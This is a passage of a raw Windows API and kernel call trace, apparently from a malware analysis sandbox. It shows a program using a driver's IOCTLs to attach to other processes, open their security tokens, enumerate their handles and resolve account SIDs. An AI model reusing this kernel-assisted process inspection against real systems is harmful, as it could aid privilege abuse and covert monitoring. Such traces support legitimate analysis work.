DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.778] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x14 [0156.778] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.778] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.778] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.778] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.778] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.781] CloseHandle (hObject=0xc4) returned 1 [0156.781] CloseHandle (hObject=0xc8) returned 1 [0156.781] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.781] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.781] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.781] PsAcquireProcessExitSynchronization () returned 0x0 [0156.781] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880051635d0) [0156.781] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020d4a20, HandleInformation=0x0) returned 0x0 [0156.781] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.781] PsReleaseProcessExitSynchronization () returned 0x2 [0156.781] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0156.781] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d5044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.781] ObfDereferenceObject (Object=0xfffffa80020d4a20) returned 0x1 [0156.781] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.782] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.782] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.782] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0156.782] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.782] PsAcquireProcessExitSynchronization () returned 0x0 [0156.782] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880051635d0) [0156.782] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020d9070, HandleInformation=0x0) returned 0x0 [0156.782] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.782] PsReleaseProcessExitSynchronization () returned 0x2 [0156.782] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0156.782] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d4044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.782] ObfDereferenceObject (Object=0xfffffa80020d9070) returned 0x1 [0156.782] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.782] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.782] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.782] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.782] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.782] PsAcquireProcessExitSynchronization () returned 0x0 [0156.783] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880051635d0) [0156.783] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.783] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.783] PsReleaseProcessExitSynchronization () returned 0x2 [0156.783] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0156.783] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030cb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030cb044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.783] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.783] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.783] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x884) returned 0xc8 [0156.783] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.783] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020d1b30, HandleInformation=0x0) returned 0x0 [0156.783] ObOpenObjectByPointer (in: Object=0xfffffa80020d1b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.783] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x14 [0156.783] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.783] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.783] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.784] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.784] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.785] CloseHandle (hObject=0xc4) returned 1 [0156.785] CloseHandle (hObject=0xc8) returned 1 [0156.786] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.786] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.786] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.786] PsAcquireProcessExitSynchronization () returned 0x0 [0156.786] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880051635d0) [0156.786] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020d4070, HandleInformation=0x0) returned 0x0 [0156.786] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.786] PsReleaseProcessExitSynchronization () returned 0x2 [0156.786] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0156.786] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.786] ObfDereferenceObject (Object=0xfffffa80020d4070) returned 0x1 [0156.786] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.786] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.786] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.786] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0156.786] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.786] PsAcquireProcessExitSynchronization () returned 0x0 [0156.786] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880051635d0) [0156.786] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020dd720, HandleInformation=0x0) returned 0x0 [0156.786] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.786] PsReleaseProcessExitSynchronization () returned 0x2 [0156.786] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0156.786] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.786] ObfDereferenceObject (Object=0xfffffa80020dd720) returned 0x1 [0156.787] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.787] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.787] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.787] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.787] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.787] PsAcquireProcessExitSynchronization () returned 0x0 [0156.787] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880051635d0) [0156.787] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.787] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.787] PsReleaseProcessExitSynchronization () returned 0x2 [0156.787] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0156.787] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.787] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.787] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.787] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0xc8 [0156.787] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.787] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020e7060, HandleInformation=0x0) returned 0x0 [0156.787] ObOpenObjectByPointer (in: Object=0xfffffa80020e7060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.788] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x14 [0156.788] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.788] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.788] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.788] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.788] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.790] CloseHandle (hObject=0xc4) returned 1 [0156.790] CloseHandle (hObject=0xc8) returned 1 [0156.790] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.790] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.790] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.790] PsAcquireProcessExitSynchronization () returned 0x0 [0156.790] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880051635d0) [0156.790] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020e4cd0, HandleInformation=0x0) returned 0x0 [0156.790] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.790] PsReleaseProcessExitSynchronization () returned 0x2 [0156.790] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0156.790] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.790] ObfDereferenceObject (Object=0xfffffa80020e4cd0) returned 0x1 [0156.791] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.791] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.791] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.791] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0156.791] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.791] PsAcquireProcessExitSynchronization () returned 0x0 [0156.791] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880051635d0) [0156.791] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020ddca0, HandleInformation=0x0) returned 0x0 [0156.791] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.791] PsReleaseProcessExitSynchronization () returned 0x2 [0156.791] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0156.791] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.791] ObfDereferenceObject (Object=0xfffffa80020ddca0) returned 0x1 [0156.791] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.791] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.791] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.791] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.791] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.792] PsAcquireProcessExitSynchronization () returned 0x0 [0156.792] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880051635d0) [0156.792] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.792] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.792] PsReleaseProcessExitSynchronization () returned 0x2 [0156.792] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0156.792] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.792] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.792] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.792] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a4) returned 0xc8 [0156.792] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.792] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020f3530, HandleInformation=0x0) returned 0x0 [0156.792] ObOpenObjectByPointer (in: Object=0xfffffa80020f3530, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.792] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x14 [0156.793] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.793] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.793] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.793] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.793] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.795] CloseHandle (hObject=0xc4) returned 1 [0156.795] CloseHandle (hObject=0xc8) returned 1 [0156.795] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.795] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.795] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.795] PsAcquireProcessExitSynchronization () returned 0x0 [0156.795] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880051635d0) [0156.795] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020f3d10, HandleInformation=0x0) returned 0x0 [0156.796] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.796] PsReleaseProcessExitSynchronization () returned 0x2 [0156.796] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0156.796] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.796] ObfDereferenceObject (Object=0xfffffa80020f3d10) returned 0x1 [0156.796] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.796] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.796] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0156.796] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.796] PsAcquireProcessExitSynchronization () returned 0x0 [0156.796] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880051635d0) [0156.796] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020e9810, HandleInformation=0x0) returned 0x0 [0156.796] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.796] PsReleaseProcessExitSynchronization () returned 0x2 [0156.796] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0156.796] ObQueryNameString (in: 